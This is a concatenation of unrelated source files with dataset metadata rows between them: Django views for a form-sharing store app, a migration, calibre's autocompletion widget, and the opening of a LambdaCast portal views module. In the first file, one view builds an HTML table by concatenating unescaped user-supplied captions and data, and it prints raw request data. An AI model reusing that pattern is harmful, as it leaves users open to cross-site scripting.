f.delete()
return HttpResponse(_("Error occurred while saving changes!"))
messages.success(request, _("Form updated successfully!"))
return HttpResponse("OK")
class FormInstanceAdd(VerifiedMixin, TemplateView):
template_name = 'store/forminstance_add.html'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
sharing = models.Sharing.objects.filter(owner=self.request.user).filter(form=form)
if form.project.owner == self.request.user or sharing:
return super(FormInstanceAdd, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add instances to this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormInstanceAdd, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
for field in fields:
if models.Image.objects.filter(formfield=field, forminstance__isnull=True).exists():
field.labelimage = models.Image.objects.get(formfield=field, forminstance__isnull=True)
elif field.type.pk == 7:
field.fpk = field.settings.split(';')[0]
context['fields'] = fields
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
if request.POST.get('connection') == "instances":
visibles = models.FormField.objects.get(pk=request.POST.get('formfield')).settings.split(';')
del visibles[0]
fpk = request.POST.get('form')
forms = '<div class="table-responsive"><table class="instances table table-hover"><thead><tr>'
for field in models.FormField.objects.filter(form=fpk).order_by('position'):
if (str(field.pk) in visibles and field.type.pk != 5 and field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
forms += '<th>'+ field.caption +'</th>'
forms += "</tr></thead><tbody>"
i = 0
for instance in models.FormInstance.objects.filter(form=models.Form.objects.get(pk=fpk)).order_by('-pk'):
forms += '<tr class="cmodal-select" name="'+str(instance.pk)+'">'
for field in models.FormField.objects.filter(form=fpk).order_by('position'):
if (str(field.pk) in visibles and field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
insd = models.ConnectionInstance.objects.get(connection__formfield = field, forminstance = instance)
elif field.type.pk == 6:
insd = models.File.objects.get(formfield = field, forminstance = instance)
elif field.type.pk == 5:
insd = models.Image.objects.get(formfield = field, forminstance = instance)
else:
insd = models.DataText.objects.get(formfield = field, forminstance = instance)
forms += '<td>' + insd.display() + '</td>'
forms += '</tr>'
i += 1
forms += '</tbody></table></div>'
if i==0:
forms = _('Connected form is empty! There is no data to show.')
return HttpResponse(forms)
else:
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
contents = json.loads(request.POST.get('contents'))
i = 0
c = 0
for field in fields:
if field.type.pk == 6 or field.type.pk == 5:
c = c + 1
elif field.type.pk == 7:
if contents[i] == '':
return HttpResponse(_("You have to choose all instances!"))
i += 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should choose all images or files."))
else:
return HttpResponse(_("You should choose image or file."))
f = models.Form.objects.get(pk=self.kwargs['form'])
fi = models.FormInstance(
form = f,
user = self.request.user
)
if fi.form.project.owner != self.request.user:
fi.approved = False
fi.save()
i = 0
for field in fields:
if (field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
if contents[i] != '':
con = models.Connection.objects.get(formfield=field)
chfi = models.FormInstance.objects.get(pk=contents[i])
ins = models.ConnectionInstance(
connection=con,
forminstance = fi,
choseninstance = chfi
)
ins.save()
elif field.type.pk == 6:
filename = "file" + str(i)
file = models.File(
formfield=field,
forminstance = fi,
file=request.FILES[filename]
)
file.save()
elif field.type.pk == 5:
imgname = "image" + str(i)
img = models.Image(
formfield=field,
forminstance = fi,
image=request.FILES[imgname]
)
img.save()
else:
data = models.DataText(
formfield = field,
forminstance = fi,
data = contents[i]
)
data.save()
i += 1
messages.success(request, _("Form instance added successfully!"))
return HttpResponse("OK")
class ProjectList(VerifiedMixin, ListView):
model = models.Project
paginate_by = 4
context_object_name = 'project_list'
def get_queryset(self):
q = self.request.GET.get('search')
if q:
ret = self.model.objects.filter(owner__pk=self.request.user.pk, title__icontains=q)
if not ret.exists():
messages.error(self.request, _("Projects with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of projects with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(owner__pk=self.request.user.pk).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(ProjectList, self).get_context_data(**kwargs)
return context
class FormList(VerifiedMixin, ListView):
model = models.Form
paginate_by = 4
context_object_name = 'form_list'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormList, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to see this forms list because you are not an owner."))
raise Http404()
def get_queryset(self):
q = self.request.GET.get('search')
if q:
ret = self.model.objects.filter(project__pk=self.kwargs['project'], title__icontains=q)
if not ret.exists():
messages.error(self.request, _("Forms with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of forms with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(project__pk=self.kwargs['project']).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(FormList, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
class SharingSomeones(VerifiedMixin, ListView):
model = models.Sharing
paginate_by = 2
context_object_name = 'sharedform_list'
template_name = 'store/sharing_someones.html'
def get_queryset(self):
return self.request.user.sharing_set.all()
class SharingMy(VerifiedMixin, ListView):
model = models.Sharing
paginate_by = 2
context_object_name = 'sharedform_list'
template_name = 'store/sharing_my.html'
def get_queryset(self):
return self.model.objects.filter(form__project__owner=self.request.user)
class SharingDelete(VerifiedMixin, DeleteView):
model = models.Sharing
slug_field = 'id'
slug_url_kwarg = 'shared_form'
success_url = reverse_lazy('project-list')
def get_success_url(self):
messages.success(self.request, _('Shared form successfully deleted!'))
return super(SharingDelete, self).get_success_url()
class FormInstanceList(VerifiedMixin, ListView):
model = models.FormInstance
paginate_by = 4
context_object_name = 'forminstance_list'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
sharing = models.Sharing.objects.filter(owner=self.request.user).filter(
form=form)
if form.project.owner == self.request.user or sharing:
return super(FormInstanceList, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add instances to this form."))
raise Http404()
def get_queryset(self):
q = self.request.GET.get('search')
if q:
datalist = models.DataText.objects.filter(formfield__form__pk=self.kwargs['form'], forminstance__isnull=False, data__icontains=q)
instanceslist = []
for i in datalist:
instanceslist.append(i.forminstance.pk)
ret = self.model.objects.filter(Q(form__pk=self.kwargs['form']), Q(approved=True), Q(pk__in=instanceslist) | Q(date__icontains=q) | Q(user__username__icontains=q)).order_by('-pk')
if not ret.exists():
messages.error(self.request, _("Instances with \"") + q + _("\" were not found!"))
else:
messages.success(self.request, _("List of instances with \"") + q + _("\" term."))
return ret
return self.model.objects.filter(form__pk=self.kwargs['form'], approved=True).order_by('-pk')
def get_context_data(self, **kwargs):
context = super(FormInstanceList, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
context['fields'] = models.FormField.objects.filter(form__pk=self.kwargs['form']).exclude(type__pk__in=[7,8,9,10]).order_by('position')
return context
class Dashboard(VerifiedMixin, ListView):
model = models.FormInstance
paginate_by = 10
context_object_name = 'instances'
template_name = 'store/dashboard.html'
def get_queryset(self):
return self.model.objects.filter(
form__project__owner=self.request.user,
approved=False)
@verified_email_required
def approve_instance(request, forminstance):
instance_obj = get_object_or_404(models.FormInstance, pk=forminstance)
if instance_obj.form.project.owner == request.user:
instance_obj.approved = True
instance_obj.save()
messages.success(request, _('Form instance approved'))
return HttpResponseRedirect(reverse_lazy('dashboard'))
else:
messages.error(request, _("You are not allowed to approve this instance."))
raise Http404()
class DeleteInstance(VerifiedMixin, DeleteView):
model = models.FormInstance
slug_field = 'id'
slug_url_kwarg = 'forminstance'
success_url = reverse_lazy('dashboard')
def get_success_url(self):
messages.success(self.request, _('Form instance deleted'))
return super(DeleteInstance, self).get_success_url()
class FormInstanceDetail(VerifiedMixin, DetailView):
model = models.FormInstance
context_object_name = 'forminstance'
slug_field = 'id'
slug_url_kwarg = 'forminstance'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user or self.get_object().user == self.request.user:
return super(FormInstanceDetail, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You can't view this instance details because it wasn't added by you."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormInstanceDetail, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
formfield_list = models.FormField.objects.filter(form__pk=self.kwargs['form']).exclude(Q(type=10)).order_by('position')
for field in formfield_list:
if field.type.pk == 3 or field.type.pk == 4:
t = field.settings.split(';')
c = models.DataText.objects.get(formfield=field, forminstance=self.kwargs['forminstance']).data.split(';')
del t[0]
del c[0]
field.options = zip(t,c)
elif field.type.pk == 7:
field.fpk = field.settings.split(';')[0]
context['formfield_list'] = formfield_list
context['instances_count'] = models.FormInstance.objects.filter(form__pk=self.kwargs['form']).count()
return context
def post(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if not form.project.owner == self.request.user:
return HttpResponse(_("You can't update instances of this form because you are not an owner."))
print(request.POST)
print(request.FILES)
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
contents = json.loads(request.POST.get('contents'))
i = 0
for field in fields:
if (field.type.pk != 8 and field.type.pk != 9 and field.type.pk != 10):
if field.type.pk == 7:
if contents[i] != '':
chfi = models.FormInstance.objects.get(pk=contents[i])
con = models.ConnectionInstance.objects.get(connection__formfield=field, forminstance=self.kwargs['forminstance'])
con.choseninstance = chfi
con.save()
elif field.type.pk == 6:
filename = "file" + str(i)
if request.FILES.get(filename):
f = models.File.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.file.delete(save=False)
f.file=request.FILES[filename]
f.save()
elif field.type.pk == 5:
imgname = "image" + str(i)
if request.FILES.get(imgname):
f = models.Image.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.image.delete(save=False)
f.image=request.FILES[imgname]
f.save()
else:
f = models.DataText.objects.get(formfield=field, forminstance=self.kwargs['forminstance'])
f.data = contents[i]
f.save()
i += 1
messages.success(request, _("Instance successfully updated!"))
return HttpResponse("OK")
class FormInstanceDelete(VerifiedMixin, TemplateView):
template_name = 'store/forminstance_delete.html'
def get_context_data(self, **kwargs):
context = super(FormInstanceDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
context['forminstance'] = models.FormInstance.objects.get(pk=self.kwargs['forminstance'])
context['dependent_count'] = models.ConnectionInstance.objects.filter(choseninstance__pk=self.kwargs['forminstance']).count()
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.FormInstance.objects.filter(form__pk=self.kwargs['form'], pk=self.kwargs['forminstance']).delete()
messages.success(request, _("Form instance successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting form instance!"))
return HttpResponseRedirect(reverse('forminstance-list', kwargs={'project': self.kwargs['project'], 'form': self.kwargs['form'] } ))
class ProjectAdd(VerifiedMixin, TemplateView):
template_name = 'store/project_add.html'
def get_context_data(self, **kwargs):
context = super(ProjectAdd, self).get_context_data(**kwargs)
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
name = self.request.POST.get('project_name')
if name.isspace() or name=='':
messages.error(request, _("Bad project name!"))
return HttpResponseRedirect(reverse('project-add'))
p = models.Project(
title=name,
owner=self.request.user,
slug=slugify(name)
)
p.save()
messages.success(request, _("Project successfully added!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': p.pk} ))
class ProjectEdit(VerifiedMixin, TemplateView):
template_name = 'store/project_edit.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(ProjectEdit, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to see this forms list"))
raise Http404()
def get_context_data(self, **kwargs):
context = super(ProjectEdit, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
name = self.request.POST.get('project_name')
if name.isspace() or name=='':
messages.error(request, _("Bad project name!"))
return HttpResponseRedirect(reverse('project-edit', kwargs={'project': self.kwargs['project'] } ))
p = models.Project.objects.get(pk=self.kwargs['project'])
p.title = name
p.slug = slugify(name)
p.save()
messages.success(request, _("Project successfully updated!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': self.kwargs['project'] } ))
class FormDelete(VerifiedMixin, TemplateView):
template_name = 'store/form_delete.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormDelete, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to delete this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.Form.objects.get(pk=self.kwargs['form']).delete()
messages.success(request, _("Form successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting form!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': self.kwargs['project'] } ))
class ProjectDelete(VerifiedMixin, TemplateView):
template_name = 'store/project_delete.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(ProjectDelete, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to delete this project."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(ProjectDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.Project.objects.get(pk=self.kwargs['project']).delete()
messages.success(request, _("Project successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting project!"))
return HttpResponseRedirect(reverse('project-list'))
class FormShare(VerifiedMixin, CreateView):
model = models.Sharing
template_name = 'store/form_share.html'
form_class = FormShareForm
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user:
return super(FormShare, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You can't share this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormShare, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form_id'] = models.Form.objects.get(pk=self.kwargs['form'])
return context
def form_valid(self, form):
form.instance.form = models.Form.objects.get(pk=self.kwargs['form'])
form.instance.owner = User.objects.get(pk=form.cleaned_data.get('user'))
return super(FormShare, self).form_valid(form)
def get_success_url(self):
messages.success(self.request, _("Form successfully shared!"))
return reverse_lazy('forminstance-list', args=[self.kwargs['project'], self.kwargs['form']])
def get_form_kwargs(self):
kwargs = super(FormShare, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
|
mit
| 6,421,516,021,437,837,000 | 44.031662 | 191 | 0.555516 | false |
adaptive-learning/flocs-web
|
practice/migrations/0011_programsnapshot.py
|
1
|
1056
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import flocsweb.mixins
import datetime
import uuid
class Migration(migrations.Migration):
dependencies = [
('practice', '0010_remove_tasksession_creation_timestamp'),
]
operations = [
migrations.CreateModel(
name='ProgramSnapshot',
fields=[
('program_snapshot_id', models.UUIDField(serialize=False, editable=False, primary_key=True, default=uuid.uuid4)),
('order', models.IntegerField()),
('time', models.DateTimeField(default=datetime.datetime.now)),
('program', models.TextField()),
('execution', models.BooleanField(default=False)),
('correct', models.NullBooleanField(default=None)),
('task_session_id', models.ForeignKey(related_name='snapshots', to='practice.TaskSession')),
],
bases=(models.Model, flocsweb.mixins.ImportExportMixin),
),
]
|
gpl-3.0
| -3,683,538,642,854,860,000 | 34.2 | 129 | 0.610795 | false |
sharad/calibre
|
src/calibre/gui2/complete2.py
|
1
|
18187
|
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2012, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import weakref
import sip
from PyQt5.Qt import (
QLineEdit, QAbstractListModel, Qt, pyqtSignal, QObject, QKeySequence,
QApplication, QListView, QPoint, QModelIndex, QFont, QFontInfo,
QStyleOptionComboBox, QStyle, QComboBox, QTimer)
from calibre.constants import isosx, get_osx_version
from calibre.utils.icu import sort_key, primary_startswith, primary_contains
from calibre.gui2.widgets import EnComboBox, LineEditECM
from calibre.utils.config import tweaks
def containsq(x, prefix):
return primary_contains(prefix, x)
class CompleteModel(QAbstractListModel): # {{{
def __init__(self, parent=None, sort_func=sort_key):
QAbstractListModel.__init__(self, parent)
self.sort_func = sort_func
self.all_items = self.current_items = ()
self.current_prefix = ''
def set_items(self, items):
items = [unicode(x.strip()) for x in items]
items = [x for x in items if x]
items = tuple(sorted(items, key=self.sort_func))
self.beginResetModel()
self.all_items = self.current_items = items
self.current_prefix = ''
self.endResetModel()
def set_completion_prefix(self, prefix):
old_prefix = self.current_prefix
self.current_prefix = prefix
if prefix == old_prefix:
return
if not prefix:
self.beginResetModel()
self.current_items = self.all_items
self.endResetModel()
return
subset = prefix.startswith(old_prefix)
universe = self.current_items if subset else self.all_items
func = primary_startswith if tweaks['completion_mode'] == 'prefix' else containsq
self.beginResetModel()
self.current_items = tuple(x for x in universe if func(x, prefix))
self.endResetModel()
def rowCount(self, *args):
return len(self.current_items)
def data(self, index, role):
if role == Qt.DisplayRole:
try:
return self.current_items[index.row()]
except IndexError:
pass
def index_for_prefix(self, prefix):
for i, item in enumerate(self.current_items):
if primary_startswith(item, prefix):
return self.index(i)
# }}}
class Completer(QListView): # {{{
item_selected = pyqtSignal(object)
relayout_needed = pyqtSignal()
def __init__(self, completer_widget, max_visible_items=7, sort_func=sort_key):
QListView.__init__(self)
self.disable_popup = False
self.completer_widget = weakref.ref(completer_widget)
self.setWindowFlags(Qt.Popup)
self.max_visible_items = max_visible_items
self.setEditTriggers(self.NoEditTriggers)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setSelectionBehavior(self.SelectRows)
self.setSelectionMode(self.SingleSelection)
self.setAlternatingRowColors(True)
self.setModel(CompleteModel(self, sort_func=sort_func))
self.setMouseTracking(True)
self.entered.connect(self.item_entered)
self.activated.connect(self.item_chosen)
self.pressed.connect(self.item_chosen)
self.installEventFilter(self)
def hide(self):
self.setCurrentIndex(QModelIndex())
QListView.hide(self)
def item_chosen(self, index):
if not self.isVisible():
return
self.hide()
text = self.model().data(index, Qt.DisplayRole)
self.item_selected.emit(unicode(text))
def set_items(self, items):
self.model().set_items(items)
if self.isVisible():
self.relayout_needed.emit()
def set_completion_prefix(self, prefix):
self.model().set_completion_prefix(prefix)
if self.isVisible():
self.relayout_needed.emit()
def item_entered(self, idx):
if self.visualRect(idx).top() < self.viewport().rect().bottom() - 5:
# Prevent any bottom item in the list that is only partially
# visible from triggering setCurrentIndex()
self.entered.disconnect()
try:
self.setCurrentIndex(idx)
finally:
self.entered.connect(self.item_entered)
def next_match(self, previous=False):
c = self.currentIndex()
if c.isValid():
r = c.row()
else:
r = self.model().rowCount() if previous else -1
r = r + (-1 if previous else 1)
index = self.model().index(r % self.model().rowCount())
self.setCurrentIndex(index)
def scroll_to(self, orig):
if orig:
index = self.model().index_for_prefix(orig)
if index is not None and index.isValid():
self.setCurrentIndex(index)
def popup(self, select_first=True):
if self.disable_popup:
return
p = self
m = p.model()
widget = self.completer_widget()
if widget is None:
return
screen = QApplication.desktop().availableGeometry(widget)
h = (p.sizeHintForRow(0) * min(self.max_visible_items, m.rowCount()) +
3) + 3
hsb = p.horizontalScrollBar()
if hsb and hsb.isVisible():
h += hsb.sizeHint().height()
rh = widget.height()
pos = widget.mapToGlobal(QPoint(0, widget.height() - 2))
w = min(widget.width(), screen.width())
if (pos.x() + w) > (screen.x() + screen.width()):
pos.setX(screen.x() + screen.width() - w)
if pos.x() < screen.x():
pos.setX(screen.x())
top = pos.y() - rh - screen.top() + 2
bottom = screen.bottom() - pos.y()
h = max(h, p.minimumHeight())
if h > bottom:
h = min(max(top, bottom), h)
if top > bottom:
pos.setY(pos.y() - h - rh + 2)
p.setGeometry(pos.x(), pos.y(), w, h)
if (tweaks['preselect_first_completion'] and select_first and not
self.currentIndex().isValid() and self.model().rowCount() > 0):
self.setCurrentIndex(self.model().index(0))
if not p.isVisible():
if isosx and get_osx_version() >= (10, 9, 0):
# On mavericks the popup menu seems to use a font smaller than
# the widgets font, see for example:
# https://bugs.launchpad.net/bugs/1243761
fp = QFontInfo(widget.font())
f = QFont()
f.setPixelSize(fp.pixelSize())
self.setFont(f)
p.show()
def debug_event(self, ev):
from calibre.gui2 import event_type_name
print ('Event:', event_type_name(ev))
if ev.type() in (ev.KeyPress, ev.ShortcutOverride, ev.KeyRelease):
print ('\tkey:', QKeySequence(ev.key()).toString())
def eventFilter(self, obj, e):
'Redirect key presses from the popup to the widget'
widget = self.completer_widget()
if widget is None or sip.isdeleted(widget):
return False
etype = e.type()
if obj is not self:
return QObject.eventFilter(self, obj, e)
# self.debug_event(e)
if etype == e.KeyPress:
key = e.key()
if key == Qt.Key_Escape:
self.hide()
e.accept()
return True
if key == Qt.Key_F4 and e.modifiers() & Qt.AltModifier:
self.hide()
e.accept()
return True
if key in (Qt.Key_Enter, Qt.Key_Return):
# We handle this explicitly because on OS X activated() is
# not emitted on pressing Enter.
idx = self.currentIndex()
if idx.isValid():
self.item_chosen(idx)
self.hide()
e.accept()
return True
if key == Qt.Key_Tab:
idx = self.currentIndex()
if idx.isValid():
self.item_chosen(idx)
self.hide()
elif self.model().rowCount() > 0:
self.next_match()
e.accept()
return True
if key in (Qt.Key_PageUp, Qt.Key_PageDown):
# Let the list view handle these keys
return False
if key in (Qt.Key_Up, Qt.Key_Down):
self.next_match(previous=key == Qt.Key_Up)
e.accept()
return True
# Send to widget
widget.eat_focus_out = False
widget.keyPressEvent(e)
widget.eat_focus_out = True
if not widget.hasFocus():
# Widget lost focus hide the popup
self.hide()
if e.isAccepted():
return True
elif isosx and etype == e.InputMethodQuery and e.queries() == (Qt.ImHints | Qt.ImEnabled) and self.isVisible():
# In Qt 5 the Esc key causes this event and the line edit does not
# handle it, which causes the parent dialog to be closed
# See https://bugreports.qt-project.org/browse/QTBUG-41806
e.accept()
return True
elif etype == e.MouseButtonPress and not self.rect().contains(self.mapFromGlobal(e.globalPos())):
# A click outside the popup, close it
if isinstance(widget, QComboBox):
# This workaround is needed to ensure clicking on the drop down
# arrow of the combobox closes the popup
opt = QStyleOptionComboBox()
widget.initStyleOption(opt)
sc = widget.style().hitTestComplexControl(QStyle.CC_ComboBox, opt, widget.mapFromGlobal(e.globalPos()), widget)
if sc == QStyle.SC_ComboBoxArrow:
QTimer.singleShot(0, self.hide)
e.accept()
return True
self.hide()
e.accept()
return True
elif etype in (e.InputMethod, e.ShortcutOverride):
QApplication.sendEvent(widget, e)
return False
# }}}
class LineEdit(QLineEdit, LineEditECM):
'''
A line edit that completes on multiple items separated by a
separator. Use the :meth:`update_items_cache` to set the list of
all possible completions. Separator can be controlled with the
:meth:`set_separator` and :meth:`set_space_before_sep` methods.
A call to self.set_separator(None) will allow this widget to be used
to complete non multiple fields as well.
'''
def __init__(self, parent=None, completer_widget=None, sort_func=sort_key):
QLineEdit.__init__(self, parent)
self.sep = ','
self.space_before_sep = False
self.add_separator = True
self.original_cursor_pos = None
completer_widget = (self if completer_widget is None else
completer_widget)
self.mcompleter = Completer(completer_widget, sort_func=sort_func)
self.mcompleter.item_selected.connect(self.completion_selected,
type=Qt.QueuedConnection)
self.mcompleter.relayout_needed.connect(self.relayout)
self.mcompleter.setFocusProxy(completer_widget)
self.textEdited.connect(self.text_edited)
self.no_popup = False
# Interface {{{
def update_items_cache(self, complete_items):
self.all_items = complete_items
def set_separator(self, sep):
self.sep = sep
def set_space_before_sep(self, space_before):
self.space_before_sep = space_before
def set_add_separator(self, what):
self.add_separator = bool(what)
@dynamic_property
def all_items(self):
def fget(self):
return self.mcompleter.model().all_items
def fset(self, items):
self.mcompleter.model().set_items(items)
return property(fget=fget, fset=fset)
@dynamic_property
def disable_popup(self):
def fget(self):
return self.mcompleter.disable_popup
def fset(self, val):
self.mcompleter.disable_popup = bool(val)
return property(fget=fget, fset=fset)
# }}}
def complete(self, show_all=False, select_first=True):
orig = None
if show_all:
orig = self.mcompleter.model().current_prefix
self.mcompleter.set_completion_prefix('')
if not self.mcompleter.model().current_items:
self.mcompleter.hide()
return
self.mcompleter.popup(select_first=select_first)
self.setFocus(Qt.OtherFocusReason)
self.mcompleter.scroll_to(orig)
def relayout(self):
self.mcompleter.popup()
self.setFocus(Qt.OtherFocusReason)
def text_edited(self, *args):
if self.no_popup:
return
self.update_completions()
select_first = len(self.mcompleter.model().current_prefix) > 0
if not select_first:
self.mcompleter.setCurrentIndex(QModelIndex())
self.complete(select_first=select_first)
def update_completions(self):
' Update the list of completions '
self.original_cursor_pos = cpos = self.cursorPosition()
text = unicode(self.text())
prefix = text[:cpos]
complete_prefix = prefix.lstrip()
if self.sep:
complete_prefix = prefix.split(self.sep)[-1].lstrip()
self.mcompleter.set_completion_prefix(complete_prefix)
def get_completed_text(self, text):
'Get completed text in before and after parts'
if self.sep is None:
return text, ''
else:
cursor_pos = self.original_cursor_pos
if cursor_pos is None:
cursor_pos = self.cursorPosition()
self.original_cursor_pos = None
# Split text
curtext = unicode(self.text())
before_text = curtext[:cursor_pos]
after_text = curtext[cursor_pos:].rstrip()
# Remove the completion prefix from the before text
before_text = self.sep.join(before_text.split(self.sep)[:-1]).rstrip()
if before_text:
# Add the separator to the end of before_text
if self.space_before_sep:
before_text += ' '
before_text += self.sep + ' '
if self.add_separator or after_text:
# Add separator to the end of completed text
if self.space_before_sep:
text = text.rstrip() + ' '
completed_text = text + self.sep + ' '
else:
completed_text = text
return before_text + completed_text, after_text
def completion_selected(self, text):
before_text, after_text = self.get_completed_text(unicode(text))
self.setText(before_text + after_text)
self.setCursorPosition(len(before_text))
class EditWithComplete(EnComboBox):
def __init__(self, *args, **kwargs):
EnComboBox.__init__(self, *args)
self.setLineEdit(LineEdit(self, completer_widget=self, sort_func=kwargs.get('sort_func', sort_key)))
self.setCompleter(None)
self.eat_focus_out = True
self.installEventFilter(self)
# Interface {{{
def showPopup(self):
orig = self.disable_popup
self.disable_popup = False
try:
self.lineEdit().complete(show_all=True)
finally:
self.disable_popup = orig
def update_items_cache(self, complete_items):
self.lineEdit().update_items_cache(complete_items)
def set_separator(self, sep):
self.lineEdit().set_separator(sep)
def set_space_before_sep(self, space_before):
self.lineEdit().set_space_before_sep(space_before)
def set_add_separator(self, what):
self.lineEdit().set_add_separator(what)
def show_initial_value(self, what):
what = unicode(what) if what else u''
self.setText(what)
self.lineEdit().selectAll()
@dynamic_property
def all_items(self):
def fget(self):
return self.lineEdit().all_items
def fset(self, val):
self.lineEdit().all_items = val
return property(fget=fget, fset=fset)
@dynamic_property
def disable_popup(self):
def fget(self):
return self.lineEdit().disable_popup
def fset(self, val):
self.lineEdit().disable_popup = bool(val)
return property(fget=fget, fset=fset)
# }}}
def text(self):
return unicode(self.lineEdit().text())
def selectAll(self):
self.lineEdit().selectAll()
def setText(self, val):
le = self.lineEdit()
le.no_popup = True
le.setText(val)
le.no_popup = False
def setCursorPosition(self, *args):
self.lineEdit().setCursorPosition(*args)
@property
def textChanged(self):
return self.lineEdit().textChanged
def clear(self):
self.lineEdit().clear()
EnComboBox.clear(self)
def eventFilter(self, obj, e):
try:
c = self.lineEdit().mcompleter
except AttributeError:
return False
etype = e.type()
if self.eat_focus_out and self is obj and etype == e.FocusOut:
if c.isVisible():
return True
return EnComboBox.eventFilter(self, obj, e)
if __name__ == '__main__':
from PyQt5.Qt import QDialog, QVBoxLayout
app = QApplication([])
d = QDialog()
d.setLayout(QVBoxLayout())
le = EditWithComplete(d)
d.layout().addWidget(le)
items = ['one', 'otwo', 'othree', 'ooone', 'ootwo',
'oothree', 'a1', 'a2',u'Edgas', u'Èdgar', u'Édgaq', u'Edgar', u'Édgar']
le.update_items_cache(items)
le.show_initial_value('')
d.exec_()
|
gpl-3.0
| -5,513,565,515,612,933,000 | 34.795276 | 127 | 0.580675 | false |
LambdaCast/LambdaCast
|
portal/views.py
|
1
|
16341
|
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404, redirect
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core import serializers
from django.utils.translation import ugettext_lazy as _
from django.template.response import TemplateResponse
from portal.models import MediaItem, Comment, Channel, Collection, Submittal, MediaFile
from portal.forms import MediaItemForm, CommentForm, getThumbnails, ThumbnailForm, SubmittalForm
from portal.media_formats import MEDIA_FORMATS
from portal.templatetags.custom_filters import seconds_to_hms
from taggit.models import Tag
import lambdaproject.settings as settings
import djangotasks
import os
import re
from operator import attrgetter
import itertools
def index(request):
''' This view is the front page of OwnTube. It just gets the first 15 available media items and
forwards them to the template. We use Django's Paginator to have pagination '''
if request.user.is_authenticated():
